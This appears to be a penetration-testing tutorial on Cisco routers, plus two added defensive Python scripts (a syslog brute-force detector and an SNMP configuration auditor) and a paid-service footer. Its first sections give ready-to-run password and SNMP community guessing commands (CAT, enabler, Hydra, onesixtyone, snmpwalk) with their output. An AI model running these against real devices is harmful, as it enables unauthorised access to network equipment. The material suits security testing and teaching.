CISCO Penetration Testing - Password Guessing/SNMP Attacks

  • CAT (Cisco Auditing Tool)
  • This tool goes beyond simple discovery: it can run dictionary-based attacks against the Telnet server and SNMP agents.

    ./CAT -h <IP> -a password.wordlist

    BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a /tmp/dict.txt
    Cisco Auditing Tool - g0ne [null0]
    Checking Host: 10.1.1.175

    Guessing passwords:
    Invalid Password: 1234
    Invalid Password: 2read
    Invalid Password: 4changes
    Password Found: telnet
    Invalid Password: CISCO
    Invalid Password: IBM

  • Brute-enabler
  • Brute-enabler is an internal enable password guesser. It requires valid non-privileged (user mode) credentials, over either SSH or Telnet.

    ./enabler <IP> [-u username] -p password /password.wordlist [port]

    BT brute-enable-v.1.0.2 # ./enabler 10.1.1.175 telnet /tmp/dict.txt

    [`] enabler.
    [`] cisco internal bruteforcer. concept by anyone
    [`] coded by norby
    [`]
    [`] only password needed. sending [telnet]
    [`] seems we are logged in :)
    [`] telnet... wrong password
    [`] CISCO... wrong password
    [`] IBM... wrong password
    [`] OrigEquipMfr... wrong password
    [`] Cisco... wrong password
    [`] agent... wrong password
    [`] all... wrong password
    [`] possible password found: cisco

  • hydra
  • Hydra is a multi-functional password guessing tool. It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet, which may require only a password.

    Make sure you limit the threads to 4 (-t 4); more than that simply overloads the Telnet server!

    BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
    Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10
    [DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59), ~14 tries per task
    [DATA] attacking service cisco on port 23
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21673 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21670 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21673 was disconnected - exiting
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21672 terminating, can not connect
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21707 was disconnected - retrying (1 of 1 retries)
    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
    [STATUS] attack finished for 10.1.1.175 (waiting for childs to finish)
    [23][cisco] host: 10.1.1.175 login: password: telnet
    Hydra (http://www.thc.org) finished at 2007-02-26 10:54:23
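What the device's own syslog shows while a run like the CAT or Hydra session above is in progress, and how to turn that into an alert, as an added example that is not part of the original page or of any of the tools it describes. The log lines are constructed for illustration and follow the shape of the Cisco IOS SEC_LOGIN messages (%SEC_LOGIN-4-LOGIN_FAILED and %SEC_LOGIN-5-LOGIN_SUCCESS); the addresses, the threshold of 5 failures and the 60-second window are assumptions you would tune for your own devices.

```python
"""Added example: flag Telnet/SSH password-guessing bursts in Cisco IOS syslog.

Not part of the original page or of any tool it describes. The sample lines
are constructed and follow the IOS SEC_LOGIN message shape; addresses and
timestamps are made up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# The trailing "at HH:MM:SS UTC Day Mon D YYYY" stamp is part of the message
# body, so the event time is read from there rather than from the syslog prefix.
LOGIN_RE = re.compile(
    r"%SEC_LOGIN-\d-(?P<event>LOGIN_FAILED|LOGIN_SUCCESS): "
    r".*?\[user: (?P<user>[^\]]*)\] \[Source: (?P<src>[\d.]+)\] "
    r"\[localport: (?P<port>\d+)\].*? at (?P<time>\d\d:\d\d:\d\d) UTC "
    r"(?P<date>\w{3} \w{3} \d{1,2} \d{4})"
)

# Constructed sample: one admin typo from 10.1.1.20, then a six-try burst from
# 10.1.1.50 against Telnet (port 23) that ends in a successful login.
SAMPLE_LOG = """\
Feb 26 10:40:00 router 101: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.1.1.20] [localport: 22] [Reason: Login Authentication Failed] at 10:40:00 UTC Mon Feb 26 2007
Feb 26 10:40:05 router 102: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 10.1.1.20] [localport: 22] at 10:40:05 UTC Mon Feb 26 2007
Feb 26 10:54:09 router 103: %SYS-5-CONFIG_I: Configured from console by console
Feb 26 10:54:10 router 104: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ] [Source: 10.1.1.50] [localport: 23] [Reason: Login Authentication Failed] at 10:54:10 UTC Mon Feb 26 2007
Feb 26 10:54:11 router 105: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ] [Source: 10.1.1.50] [localport: 23] [Reason: Login Authentication Failed] at 10:54:11 UTC Mon Feb 26 2007
Feb 26 10:54:12 router 106: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ] [Source: 10.1.1.50] [localport: 23] [Reason: Login Authentication Failed] at 10:54:12 UTC Mon Feb 26 2007
Feb 26 10:54:13 router 107: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ] [Source: 10.1.1.50] [localport: 23] [Reason: Login Authentication Failed] at 10:54:13 UTC Mon Feb 26 2007
Feb 26 10:54:14 router 108: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ] [Source: 10.1.1.50] [localport: 23] [Reason: Login Authentication Failed] at 10:54:14 UTC Mon Feb 26 2007
Feb 26 10:54:15 router 109: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ] [Source: 10.1.1.50] [localport: 23] [Reason: Login Authentication Failed] at 10:54:15 UTC Mon Feb 26 2007
Feb 26 10:54:22 router 110: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: ] [Source: 10.1.1.50] [localport: 23] at 10:54:22 UTC Mon Feb 26 2007
"""


def parse_login_event(line):
    """Return a dict describing a SEC_LOGIN event, or None for any other line."""
    m = LOGIN_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{m['time']} {m['date']}", "%H:%M:%S %a %b %d %Y")
    return {"event": m["event"], "user": m["user"], "src": m["src"],
            "port": int(m["port"]), "ts": ts}


def _prune(window, now, window_seconds):
    """Drop failure timestamps that have fallen out of the sliding window."""
    while window and (now - window[0]).total_seconds() > window_seconds:
        window.popleft()


def detect_guessing(lines, threshold=5, window_seconds=60):
    """Return alerts: 'medium' when a source reaches `threshold` failed logins
    inside `window_seconds`, 'high' when a login from that source then succeeds
    while the burst is still inside the window (a likely guessed password)."""
    events = [e for e in map(parse_login_event, lines) if e]
    events.sort(key=lambda e: e["ts"])
    failures = defaultdict(deque)   # source address -> recent failure times
    alerted = set()                 # sources already reported at 'medium'
    alerts = []
    for e in events:
        window = failures[e["src"]]
        _prune(window, e["ts"], window_seconds)
        if e["event"] == "LOGIN_FAILED":
            window.append(e["ts"])
            if len(window) >= threshold and e["src"] not in alerted:
                alerted.add(e["src"])
                alerts.append({"severity": "medium", "src": e["src"], "time": e["ts"],
                               "issue": f"{len(window)} failed logins on port "
                                        f"{e['port']} within {window_seconds}s"})
        elif len(window) >= threshold:
            alerts.append({"severity": "high", "src": e["src"], "time": e["ts"],
                           "issue": f"login succeeded as user {e['user']!r} after "
                                    f"{len(window)} failures: likely guessed password"})
    return alerts


if __name__ == "__main__":
    for a in detect_guessing(SAMPLE_LOG.splitlines()):
        print(a["severity"].upper(), a["src"], a["time"].isoformat(), a["issue"])
```

The window is what makes the rule useful: a single mistyped password followed by a success (the 10.1.1.20 lines) produces nothing, while the burst from 10.1.1.50 raises one medium alert at the fifth failure and a high one when the empty-username Telnet login finally succeeds. Feed it `logging host` output from the router or the same lines from your SIEM.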

SNMP Attacks
  • CAT (Cisco Auditing Tool)
  • The same tool also performs dictionary-based guessing of SNMP community strings against the device's SNMP agent.

    ./CAT -h <IP> -w SNMP.wordlist

    BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -w /tmp/snmp.txt
    Cisco Auditing Tool - g0ne [null0]

    Checking Host: 10.1.1.175
    Guessing passwords:
    Invalid Password: cisco
    Invalid Password: ciscos
    Invalid Password: cisco1

    Guessing Community Names:
    Invalid Community Name: CISCO
    Invalid Community Name: IBM
    Invalid Community Name: OrigEquipMfr
    Community Name Found: Cisco
    Invalid Community Name: SNMP

  • Onesixtyone
  • onesixtyone is a reliable SNMP community string guesser. Once it identifies a valid community string, it prints the device's system description alongside it, which gives accurate fingerprinting information.

    onesixtyone -c SNMP.wordlist <IP>

    BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
    Scanning 1 hosts, 64 communities
    10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
    10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

  • snmpwalk
  • snmpwalk is part of the SNMP toolkit. After a valid community string is identified, use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information. Make sure you specify the SNMP protocol version the device actually uses, or the walk will fail. It is a good idea to redirect the output to a text file for easier viewing, as the tool produces a large amount of text.

    snmpwalk -v <Version> -c <Community string> <IP>

    BT# snmpwalk -v 1 -c enable 10.1.1.1
    SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software
    IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2005 by cisco Systems, Inc.
    Compiled Fri 12-Aug
    SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185
    DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99
    SNMPv2-MIB::sysContact.0 = STRING:
    SNMPv2-MIB::sysName.0 = STRING: router
    SNMPv2-MIB::sysLocation.0 = STRING:
    SNMPv2-MIB::sysServices.0 = INTEGER: 78
    SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00
    IF-MIB::ifNumber.0 = INTEGER: 4
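The configuration side of the same problem, as an added example that is not part of the original page or of any tool it describes: a small auditor that reads the `snmp-server community` lines of an IOS-style configuration and flags exactly what the guessing tools above take advantage of (a community string that sits in a common wordlist, a read-write community, a community with no access-list, and v1/v2c-only access with no SNMPv3 group or user). The two configuration texts, the short wordlist, the severity labels and the `AUTH-PASS-PLACEHOLDER`/`PRIV-PASS-PLACEHOLDER` values are constructed for illustration; the line syntax parsed is the standard `snmp-server community <string> [view <v>] [RO|RW] [ipv6 <nacl>] [acl]` form.

```python
"""Added example: audit SNMP community configuration in a Cisco IOS-style config.

Not part of the original page or of any tool it describes. Both configuration
texts and the wordlist are constructed for illustration.
"""
import re

# A few strings of the kind found in the SNMP wordlists the guessing tools use
# (constructed; extend from your own list). Compared case-insensitively.
COMMON_COMMUNITIES = {
    "public", "private", "cisco", "ciscos", "cisco1", "enable", "snmp",
    "ibm", "origequipmfr", "secret", "admin", "manager", "monitor",
}

# "snmp-server group <name> v3 ..." or "snmp-server user <user> <group> v3 ..."
V3_RE = re.compile(r"^snmp-server (?:group \S+|user \S+ \S+) v3\b")

# Constructed weak config: a dictionary word, a read-write community, and a
# strong string that is correctly restricted by access-list 10.
WEAK_CONFIG = """\
hostname router
snmp-server community Cisco RO
snmp-server community private RW
snmp-server community X9u2-kLp8q-Zr4t-M7vb RO 10
access-list 10 permit 10.1.1.5
"""

# Constructed hardened config: one ACL-restricted read-only community kept for
# a legacy poller, plus SNMPv3 with authentication and privacy for everything
# else (password values are placeholders).
HARDENED_CONFIG = """\
hostname router
access-list 10 permit 10.1.1.5
snmp-server community X9u2-kLp8q-Zr4t-M7vb RO 10
snmp-server group NMS v3 priv
snmp-server user nms NMS v3 auth sha AUTH-PASS-PLACEHOLDER priv aes 128 PRIV-PASS-PLACEHOLDER
"""


def parse_community(line):
    """Parse one 'snmp-server community' line; None for any other line.
    Mode defaults to RO when omitted, as it does on IOS."""
    parts = line.strip().split()
    if parts[:2] != ["snmp-server", "community"] or len(parts) < 3:
        return None
    entry = {"name": parts[2], "mode": "RO", "view": None, "acl": None}
    i = 3
    while i < len(parts):
        tok = parts[i]
        if tok.lower() in ("view", "ipv6"):
            # keyword takes one argument; the ipv6 nacl is not assessed here
            if tok.lower() == "view" and i + 1 < len(parts):
                entry["view"] = parts[i + 1]
            i += 2
        elif tok.upper() in ("RO", "RW"):
            entry["mode"] = tok.upper()
            i += 1
        else:
            entry["acl"] = tok          # trailing token is the access-list
            i += 1
    return entry


def audit_config(config_text):
    """Return a list of findings ({community, severity, issue}) for the config."""
    communities, has_v3 = [], False
    for line in config_text.splitlines():
        if V3_RE.match(line.strip()):
            has_v3 = True
        entry = parse_community(line)
        if entry:
            communities.append(entry)
    findings = []
    for c in communities:
        if c["name"].lower() in COMMON_COMMUNITIES:
            findings.append((c["name"], "high",
                             "community string appears in common guessing wordlists"))
        if c["mode"] == "RW":
            findings.append((c["name"], "high",
                             "read-write community: SNMP writes can alter the device"))
        if c["acl"] is None:
            findings.append((c["name"], "medium",
                             "no access-list: any host reaching UDP/161 may use it"))
    if communities and not has_v3:
        findings.append(("*", "medium",
                         "only community-based (v1/v2c) access; no SNMPv3 group or user"))
    return [{"community": n, "severity": s, "issue": i} for n, s, i in findings]


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label}: {len(audit_config(cfg))} finding(s)")
        for f in audit_config(cfg):
            print(f"  [{f['severity']}] {f['community']}: {f['issue']}")
```

Run it over the output of `show running-config` (the `snmp-server community` lines survive `service password-encryption`, so they are visible in plain text). The weak config yields six findings, three of them high; the hardened one yields none, because the remaining community is a long random string, read-only, bound to an access-list, and SNMPv3 is present for normal management.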

To receive your CISCO Password Recovery Service, please submit your payment of $1999.00. If more than 100 miles of travel will be required, the additional cost will be billed separately.


COPYRIGHT (C) 2000 - 2011 InfoSecPro.com ALL RIGHTS RESERVED